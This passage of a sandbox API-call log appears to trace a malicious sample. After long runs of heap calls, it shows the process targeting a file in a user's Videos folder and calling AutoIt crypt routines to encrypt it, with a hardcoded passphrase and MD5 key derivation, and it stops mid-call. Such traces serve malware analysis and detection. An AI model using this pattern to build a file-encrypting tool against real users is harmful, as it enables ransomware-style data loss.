[0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.055] FreeLibrary (hLibModule=0x772d0000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0101.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.056] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.056] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.056] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0101.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0101.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7518 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0101.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0101.106] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0101.107] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0101.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.107] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0101.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca4f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0101.108] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0101.108] CloseHandle (hObject=0x258) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0101.108] FreeLibrary (hLibModule=0x772d0000) returned 1 [0101.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.108] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0101.108] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc2f0d90, ftCreationTime.dwHighDateTime=0x1d5f0ac, ftLastAccessTime.dwLowDateTime=0x588a2820, ftLastAccessTime.dwHighDateTime=0x1d5e455, ftLastWriteTime.dwLowDateTime=0x588a2820, ftLastWriteTime.dwHighDateTime=0x1d5e455, nFileSizeHigh=0x0, nFileSizeLow=0x18727, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="3lc9YJH.swf", cAlternateFileName="")) returned 0x41ac500 [0101.109] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0101.109] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0101.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0101.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0101.109] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0101.110] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0101.110] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.110] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0101.110] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.110] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.110] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.110] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caaa8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0101.111] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0101.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0101.111] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.112] RtlAllocateHeap 